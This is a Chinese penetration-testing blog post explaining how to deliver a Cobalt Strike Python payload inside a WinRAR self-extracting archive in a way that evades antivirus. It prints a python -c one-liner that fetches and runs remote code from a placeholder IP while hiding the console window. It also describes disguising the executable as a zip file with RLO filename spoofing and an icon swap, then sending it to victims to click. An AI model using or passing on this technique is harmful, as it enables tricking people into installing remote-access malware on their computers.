MENU

利用自解压进行python免杀上线

December 13, 2019 • 渗透测试

导读

可能方法不再免杀了,因为这个方法用了蛮久了,现在发出来提供思路,怎么玩大家自由发挥...

自解压

winrar 设置自解压,可以设置解压选项,在解压的时候执行某些命令,可以利用这个进行操作

实操

准备一个python27环境,然后准备一个show.exe 隐藏cmd窗口的程序 地址:https://github.com/chumengfile/Show-Hide-Windows

我准备的python环境是python-2.7.15

1.png

安装好python,然后在把winrar安装好

然后使用CS,生成一个pyhton的脚本马

python -c "import urllib2; exec urllib2.urlopen('http://xx.xx.xx.xx:80/a').read();"

然后我们简单改一下

python -c "import urllib2,os; os.system('show.exe -h');exec urllib2.urlopen('http://xx.xx.xx.xx:80/ac').read();"

再去打包这个python目录制作自解压的木马,设置一下运行的命令如下图

2.png

打包出来文件有点大,20多MB,然后使用RLO文件名欺骗改成如下格式

3.png

看着是zip,实际上是exe的应用程序,然后把图标换了,完美~ ,我就不演示换图标了

然后发送给别人点击,成功上线

4.png

此方法,之前我玩的时候就是免杀的,现在已经不免杀我的def了,其他杀软未测试,但是怎么免杀你们比我懂,就不说了~ ,看在自解压这个姿势到处都再发了,我就写出来吧...

吐槽

另外吐槽一下:直接python上线是可以免杀的,如果目标机器有python环境的话..keke ,此文就是写一下大概思路,具体怎么发挥靠你们自己了

Last Modified: December 15, 2019